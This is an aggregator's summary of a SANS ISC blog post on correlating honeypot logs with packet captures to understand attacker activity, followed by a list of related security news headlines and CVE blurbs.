Is that It? Finding the Unknown: Correlations Between Honeypot Logs & PCAPs

Simply parsing through the logs may not always give you a complete picture either.
This blog post will walk through the steps I have taken to build a bigger picture to make an attack observation, briefly going over various attacks such as malicious files, HTTP requests, Cowrie/Webhoneypot JSON logs and PCAPs.
Reviewing the cowrie JSON logs pulls everything with all relevant details for each IP address into a format I feel is a bit easier to follow.
Some data may not always populate on the SIEM, so it isn't a bad idea to review the logs from the honeypot to confirm.
You could also parse through the logs manually to get similar data.
For me, reviewing these requests on the SIEM or parsing through the logs still didn't answer why.
Since the SIEM wasn't cutting it for me with web requests, I turned to the logs from the sensors to manually parse.
Parsing the logs reveals a lot of details about an IP address or even web requests.
Once you understand the structure of the JSON files, it is simple to parse the logs based on just about any search criteria.
Aside from manually parsing the files like the TELNET/SSH logs, I created a script specific to the format for these logs.
While the web logs provide a lot of details, this goes back to what I mentioned earlier about something still seemed to be missing and answering the question of why these are being accessed.
Having a honeypot running provides only so much insight into what a threat actor is doing just by reviewing the logs.
What you don't get with the web logs from the honeypot is any inclination of what the threat actor may be doing - at least not from what I was able to observe.
Going back to how Daemonlogger is setup, it logs one PCAP file to a daily folder.
Parsing through the honeypot logs, I couldn't find any correlation of that command.
Without it, all you would find in the logs is that the HTTP request method is POST and URL is /device.
If you didn't catch the details regarding data retention on the sensor at the start of the internship, the logs are deleted at certain intervals.
If you want to retain logs, set up an automatic way to transfer the logs to a separate system or a separate folder on the sensor.
My first or second attack observation included some logs that just so happen to be at the tail end of when they are deleted.
If you want long-term data retention for any of the logs, transfer the logs to another folder or system.


This Cyber News was published on isc.sans.edu. Publication date: Wed, 29 May 2024 01:13:14 +0000


Cyber News related to Is that It? Finding the Unknown: Correlations Between Honeypot Logs & PCAPs

Is that It? Finding the Unknown: Correlations Between Honeypot Logs & PCAPs - Simply parsing through the logs may not always give you a complete picture either. This blog post will walk through the steps I have taken to build a bigger picture to make an attack observation, briefly going over various attacks such as malicious ...
6 months ago Isc.sans.edu
Flask Web App: Smart Honeypot Deployment With RL - The goal of a honeypot is to deceive attackers into interacting with them, enabling security experts to observe and analyze their behavior. By applying RL, we can develop a smart honeypot deployment system that learns and adapts to emerging threats ...
5 months ago Feeds.dzone.com
Empowering Global Cybersecurity: The Future with Dianoea Darwis Honeypot - The challenges posed by cyber threats are too vast for any single entity to tackle alone. The Foundation's initiative highlights the importance of collaboration in cybersecurity. By providing tools like the Dianoea Darwis Honeypot and its analysis ...
11 months ago Cysecurity.news
Kickstart Your DShield Honeypot [Guest Diary] - SANS Internet Storm Center - •    ISC Handlers and Interns: This tool provides a streamlined process for post-installation setup, allowing for faster honeypot deployment and data collection. •    Automated Log Backups: The script ...
2 months ago Isc.sans.edu
Auditing Kubernetes with Open Source SIEM and XDR - Container technology has gained traction among businesses due to the increased efficiency it provides. In this regard, organizations widely use Kubernetes for deploying, scaling, and managing containerized applications. Organizations should audit ...
1 year ago Thehackernews.com
What Setting Live Traps for Cybercriminals Taught Me About Security - The Storm Center is a worldwide network of honeypots that are set up and monitored by volunteers. For anyone who doesn't know what a honeypot is, it is a server created specifically for the purpose of gathering information about unauthorized users ...
5 months ago Isc.sans.edu
6 Best Anonymous VPNs for 2024 - VPNs are primarily used to secure online traffic and help users remain anonymous to avoid targeted ads, hide their location or ensure the security and privacy of their personal data. Though many VPN providers may advertise having a no-logs policy, ...
11 months ago Techrepublic.com
5 Lessons Learned from Windows Remote Desktop Honeypot Report - Recently, the SANS Institute released their annual Windows Remote Desktop Honeypot Report, providing comprehensive insights into the nature of malicious activity in a Windows environment. In order to understand how your own Windows network can be ...
1 year ago Bleepingcomputer.com
Mallox Ransomware Deployed Via MS-SQL Honeypot Attack - A recent incident involving an MS-SQL honeypot has shed light on the sophisticated tactics employed by cyber-attackers relying on Mallox ransomware. The honeypot, set up by the Sekoia research team, was targeted by an intrusion set utilizing ...
7 months ago Infosecurity-magazine.com
InfectedSlurs Botnet Spreads Mirai via Zero-Days - The payload targets routers and network video recorder devices with default admin credentials and installs Mirai variants when successful. Until November 9, 2023, the vulnerable devices being targeted were unknown. Since both the name and the version ...
1 year ago Akamai.com
Microsoft fixes critical Azure CLI flaw that leaked credentials in logs - Microsoft has fixed a critical security vulnerability that could let attackers steal credentials from GitHub Actions or Azure DevOps logs created using Azure CLI. The vulnerability was reported by security researchers with Palo Alto's Prisma Cloud. ...
1 year ago Bleepingcomputer.com
Is the vCISO model right for your business? - It's getting harder to justify not having a CISO, so many businesses that have never had a CISO are filling the gap with a virtual CISO. A vCISO, sometimes referred to as a fractional CISO or CISO-as-a-Service, is typically a part-time outsourced ...
11 months ago Darkreading.com
CVE-2024-47083 - Power Platform Terraform Provider allows managing environments and other resources within Power Platform. Versions prior to 3.0.0 have an issue in the Power Platform Terraform Provider where sensitive information, specifically the `client_secret` ...
2 months ago
Using Falco to Create Custom Identity Detections - Recent months have witnessed a surge in attacks targeting popular identity providers like Okta, underscoring the critical need for timely and effective detection capabilities. Open-source Falco offers a Dedicated plugin for the Okta identity ...
1 year ago Feeds.dzone.com
JPCERT shares Windows Event Log tips to detect ransomware attacks - Japan's Computer Emergency Response Center (JPCERT/CC) has shared tips on detecting different ransomware gang's attacks based on entries in Windows Event Logs, providing timely detection of ongoing attacks before they spread too far into a network. ...
2 months ago Bleepingcomputer.com
Use Windows event logs for ransomware investigations, JPCERT/CC advises - Help Net Security - The JPCERT Coordination Center – the first Computer Security Incident Response Team established in Japan – has compiled a list of entries in Windows event logs that could help enterprise defenders respond to human-operated ransomware ...
2 months ago Helpnetsecurity.com
Comprehensive Guide to Fraud Detection, Management, & Analysis - To mitigate risks, businesses can use risk management strategies, including fraud detection software, company policies, and staff ranging from risk managers and trust officers to fraud analysts. Affiliate Fraud - Affiliates in a marketing arrangement ...
11 months ago Securityboulevard.com
CVE-2024-24933 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Prasidhda Malla Honeypot for WP Comment allows Reflected XSS.This issue affects Honeypot for WP Comment: from n/a through 2.2.3. ...
10 months ago
CVE-2024-29091 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dnesscarkey WP Armour – Honeypot Anti Spam allows Reflected XSS.This issue affects WP Armour – Honeypot Anti Spam: from n/a through ...
9 months ago
CVE-2024-1350 - Missing Authorization vulnerability in Prasidhda Malla Honeypot for WP Comment.This issue affects Honeypot for WP Comment: from n/a through 2.2.3. ...
8 months ago
CVE-2023-45009 - Improper Restriction of Excessive Authentication Attempts vulnerability in Forge12 Interactive GmbH Captcha/Honeypot for Contact Form 7 allows Functionality Bypass.This issue affects Captcha/Honeypot for Contact Form 7: from n/a through 1.11.3. ...
6 months ago
Cyber Criminals Exploiting MS-SQL Severs To Deploy Mallox Ransomware - The MS-SQL honeypot incident that took place recently highlighted the sophisticated strategies used by cybercriminals that rely on the Mallox ransomware. The honeypot, set up by the Sekoia researchers, was targeted by an intrusion set employing ...
7 months ago Cysecurity.news
Microsoft Defender for Endpoint is Integrated with Check Point Horizon XDR/XPR - Microsoft Defender for Endpoint integrates with Check Point's extended detection and response solution - Horizon XDR/XPR. One-click integration connects the endpoint solution and telemetry is added to the XDR/XPR artificial intelligence driven data ...
11 months ago Blog.checkpoint.com
CVE-2018-14995 - The ZTE Blade Vantage Android device with a build fingerprint of ZTE/Z839/sweet:7.1.1/NMF26V/20180120.095344:user/release-keys, the ZTE Blade Spark Android device with a build fingerprint of ...
5 years ago
CVE-2020-5414 - VMware Tanzu Application Service for VMs (2.7.x versions prior to 2.7.19, 2.8.x versions prior to 2.8.13, and 2.9.x versions prior to 2.9.7) contains an App Autoscaler that logs the UAA admin password. This credential is redacted on VMware Tanzu ...
4 years ago

Latest Cyber News


Cyber Trends (last 7 days)


Trending Cyber News (last 7 days)